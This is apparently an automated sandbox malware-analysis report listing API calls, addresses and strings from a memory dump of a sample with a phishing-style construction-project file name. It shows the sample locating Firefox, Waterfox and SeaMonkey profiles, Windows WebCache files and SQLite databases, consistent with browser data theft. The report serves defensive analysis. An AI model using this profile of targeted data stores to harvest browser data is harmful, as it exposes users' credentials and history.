                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                          • memset.MSVCRT ref: 00403DDA
                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                          • String ID: Waterfox$Waterfox\Profiles
                                                                                                                          • API String ID: 4039892925-11920434
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00403E50
                                                                                                                          • memset.MSVCRT ref: 00403E65
                                                                                                                          • memset.MSVCRT ref: 00403E7A
                                                                                                                          • memset.MSVCRT ref: 00403E8F
                                                                                                                          • memset.MSVCRT ref: 00403EA4
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                          • memset.MSVCRT ref: 00403F6B
                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                          • API String ID: 4039892925-2068335096
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00403FE1
                                                                                                                          • memset.MSVCRT ref: 00403FF6
                                                                                                                          • memset.MSVCRT ref: 0040400B
                                                                                                                          • memset.MSVCRT ref: 00404020
                                                                                                                          • memset.MSVCRT ref: 00404035
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                          • memset.MSVCRT ref: 004040FC
                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                          • API String ID: 4039892925-3369679110
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                          • API String ID: 3510742995-2641926074
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                          • memset.MSVCRT ref: 004033B7
                                                                                                                          • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                          • wcscmp.MSVCRT ref: 004033FC
                                                                                                                          • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                          • String ID: $0.@
                                                                                                                          • API String ID: 2758756878-1896041820
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2941347001-0
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFilefreememset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2507021081-0
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00403C09
                                                                                                                          • memset.MSVCRT ref: 00403C1E
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                          • wcscat.MSVCRT ref: 00403C47
                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                          • wcscat.MSVCRT ref: 00403C70
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                          • API String ID: 1534475566-1174173950
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                          • memset.MSVCRT ref: 00414C87
                                                                                                                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                          Strings
                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                          • API String ID: 71295984-2036018995
                                                                                                                          APIs
                                                                                                                          • wcschr.MSVCRT ref: 00414458
                                                                                                                          • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                          • String ID: "%s"
                                                                                                                          • API String ID: 1343145685-3297466227
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                                                          • API String ID: 1714573020-3385500049
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004087D6
                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                          • memset.MSVCRT ref: 00408828
                                                                                                                          • memset.MSVCRT ref: 00408840
                                                                                                                          • memset.MSVCRT ref: 00408858
                                                                                                                          • memset.MSVCRT ref: 00408870
                                                                                                                          • memset.MSVCRT ref: 00408888
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                          • String ID:
                                                                                                                          APIs
                                                                                                                          • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                          • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                          • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: memcmp
                                                                                                                          • String ID: @ $SQLite format 3
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmpqsort
                                                                                                                          • String ID: /nosort$/sort
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040E60F
                                                                                                                          • memset.MSVCRT ref: 0040E629
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                          Strings
                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                          Similarity
                                                                                                                          • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                          APIs
                                                                                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                          • String ID:
                                                                                                                          APIs
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(02130048), ref: 0044DF01
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(02140050), ref: 0044DF11
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00626DB0), ref: 0044DF21
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(02140458), ref: 0044DF31
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@
                                                                                                                          • String ID:
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                          Similarity
                                                                                                                          • API ID: memset
                                                                                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                          APIs
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@DeleteObject
                                                                                                                          • String ID: r!A
                                                                                                                          APIs
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1033339047-0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                            • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                          • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$memcmp
                                                                                                                          • String ID: $$8
                                                                                                                          • API String ID: 2808797137-435121686
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                            • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                          • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                          • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                            • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1979745280-0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                            • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
